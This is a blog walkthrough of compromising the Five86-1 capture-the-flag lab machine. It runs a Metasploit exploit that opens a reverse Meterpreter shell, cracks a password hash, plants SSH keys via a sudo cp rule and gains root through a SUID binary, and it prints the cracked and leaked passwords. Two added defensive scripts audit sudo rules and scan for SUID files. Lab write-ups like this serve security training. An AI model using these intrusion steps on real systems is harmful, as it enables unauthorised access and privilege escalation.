Eki
2021-05-10
# Five86-1 Vulnerable Machine Walkthrough

# 0x01 Penetration Practice

An nmap scan shows ports 22 and 80 open.

Port 80 serves an OpenNetAdmin instance.

Searching Exploit-DB turns up a Metasploit module for exactly this version, so download it and try it out.

```
msfdb init
msfconsole
msf5 > use exploit/47772
msf5 exploit(47772) > set rhost 192.168.31.179
rhost => 192.168.31.179
msf5 exploit(47772) > set lhost 192.168.31.51
lhost => 192.168.31.51
msf5 exploit(47772) > exploit

[*] Started reverse TCP handler on 192.168.31.51:4444
[*] Exploiting...
[*] Sending stage (985320 bytes) to 192.168.31.179
[*] Meterpreter session 1 opened (192.168.31.51:4444 -> 192.168.31.179:59022) at 2020-02-27 21:29:15 +0800
[*] Command Stager progress - 100.14% done (706/705 bytes)

meterpreter >
```

Next comes the slow work of looking for a foothold to escalate from.

The directories under /home cannot be entered.

There is a .htpasswd file under /var/www.

It presumably just stores a single user; through the web site you only get that user's privileges.

```
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
```

They were even kind enough to leave a hint that makes building a brute-force wordlist easy...

```
root@kali:~/five86# crunch 10 10 aefhrt > dic.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176

root@kali:~/five86#
root@kali:~/five86# echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash
root@kali:~/five86# john --wordlist=/root/five86/dic.txt hash
```

Cracking yields fatherrrrr (for douglas).

```
meterpreter > shell
Process 2331 created.
Channel 4 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@five86-1:~$ su douglas
su douglas
Password: fatherrrrr

douglas@five86-1:/var/www$
```

Check `sudo -l`.

```
douglas@five86-1:~$ sudo -l
sudo -l
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
```

So we can use jen's privileges to copy our authorized_keys into the .ssh directory in his home, and then SSH in as his account.

```bash
cat id_rsa.pub > /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh
```

```bash
cd .ssh
cp id_rsa /tmp
cd /tmp
chmod 600 id_rsa
ssh -i id_rsa jen@localhost
```

Note that the permissions on id_rsa must be set to 600, otherwise you get:

```
Permissions 0777 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
```
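The sudoers rule above, `(jen) NOPASSWD: /bin/cp`, is the whole boundary failure in this step: a general-purpose file utility runnable as another user lets the caller place files in that user's home, and the key-permission error is the one check OpenSSH does enforce on its side. The script below is an added example and not code from the original post; it parses `sudo -l` output in the format shown, flags rules a defender should review (NOPASSWD, or a binary that can write arbitrary files as the target user), and reproduces the private-key mode check. The second rule in the sample, `(root) /usr/bin/apt-get update`, is constructed for contrast, and the list of file-writing utilities is my assumption; the page only demonstrates cp.

```python
import re

# Utilities that, when run via sudo as another user, can write arbitrary
# files as that user (assumption: this list is mine, the page only shows cp).
FILE_WRITERS = {"cp", "mv", "dd", "tee", "install"}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: /path/cmd args, /other/cmd"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)

# Constructed sample: the `sudo -l` output from the walkthrough plus one
# constructed benign rule for contrast.
SUDO_L_OUTPUT = """
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
    (root) /usr/bin/apt-get update
"""


def parse_sudo_l(text):
    """Return one dict per command in the 'may run the following commands' section."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split()}
        # A single rule line may list several commands separated by ", ".
        for cmd in m.group("cmd").split(", "):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def audit_sudo_rules(text):
    """Flag rules needing review: NOPASSWD, or a binary that writes files as runas."""
    findings = []
    for rule in parse_sudo_l(text):
        binary = rule["command"].split()[0].rsplit("/", 1)[-1]
        reasons = []
        if rule["nopasswd"]:
            reasons.append("NOPASSWD")
        if binary in FILE_WRITERS:
            reasons.append(f"{binary} can write arbitrary files as {rule['runas']}")
        if reasons:
            findings.append((rule["runas"], rule["command"], reasons))
    return findings


def private_key_mode_ok(mode):
    """OpenSSH ignores a private key that group or others can read or write
    ("Permissions 0777 for 'id_rsa' are too open"); mode is st_mode & 0o777."""
    return (mode & 0o077) == 0


if __name__ == "__main__":
    for runas, command, reasons in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"review: ({runas}) {command}: {'; '.join(reasons)}")
    print("0600 ok:", private_key_mode_ok(0o600), "| 0777 ok:", private_key_mode_ok(0o777))
```

Run as any user on the host by piping `sudo -l` into `audit_sudo_rules`. The fix for the rule it flags here is not to grant cp at all: a wrapper script with fixed source and destination, or a dedicated sudoers entry with the full argument list, keeps jen's home out of reach.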

After logging in, `sudo -l` asks for a password.

There was actually a notice at login:

You have new mail.

So go and read the mail.

It contains:

```
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
```

Now we can log in as Moss.

`sudo -l` gives nothing,

so check for SUID binaries.

```
moss@five86-1:/var/mail$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/home/moss/.games/upyourgame
```

The last one is interesting.

```
moss@five86-1:/var/mail$ /home/moss/.games/upyourgame
/home/moss/.games/upyourgame
Would you like to play a game? yes
yes

Could you please repeat that? yes
yes

Nope, you'll need to enter that again. yes
yes

You entered: No.  Is this correct? no
no

We appear to have a problem?  Do we have a problem? no
no

Made in Britain.
# id
id
uid=0(root) gid=1001(moss) groups=1001(moss)
```

Seeing the # prompt I tried a command, and somehow I already had root...
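The SUID listing above is what makes the final escalation possible: a setuid binary sitting under a user's home directory instead of a package-managed path. The script below is an added example, not code from the original post; it reproduces `find / -perm -u=s -type f` with os.walk and os.lstat and separates SUID files outside the usual system prefixes from the expected ones. The sample input is the find output from this box, and the set of expected prefixes and skipped pseudo-filesystems is my assumption.

```python
import os
import stat

# Where distribution-packaged setuid binaries normally live (assumption: this
# list is mine, tuned to the paths seen on this box).
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/lib/", "/usr/libexec/")

# Pseudo-filesystems that only add noise to a SUID walk.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}

# Constructed sample: the `find / -perm -u=s -type f` output from the walkthrough.
SAMPLE_FIND_OUTPUT = """
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/home/moss/.games/upyourgame
"""


def parse_find_output(text):
    """One path per non-empty line."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(paths):
    """SUID files outside the package-managed prefixes: anything under /home,
    /tmp, /var or /opt lands here and deserves a look."""
    return [p for p in paths if not p.startswith(EXPECTED_PREFIXES)]


def scan_suid(root="/"):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the
    setuid bit, checked with lstat so symlinks are not followed."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


if __name__ == "__main__":
    live = scan_suid("/")
    print(f"{len(live)} setuid files; unexpected:")
    for p in unexpected_suid(live):
        print("  ", p)
```

Running `scan_suid("/")` as root on a freshly built host and storing the sorted list gives a baseline; diffing later scans against it catches a new setuid file such as upyourgame the moment it appears, whether or not its path is under an expected prefix.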

Last updated: 2021/05/11, 08:36:49
Theme by Vdoing | Copyright © 2019-2022 EkiXu | Creative Commons License
This work is licensed under a Creative Commons Attribution 4.0 International License.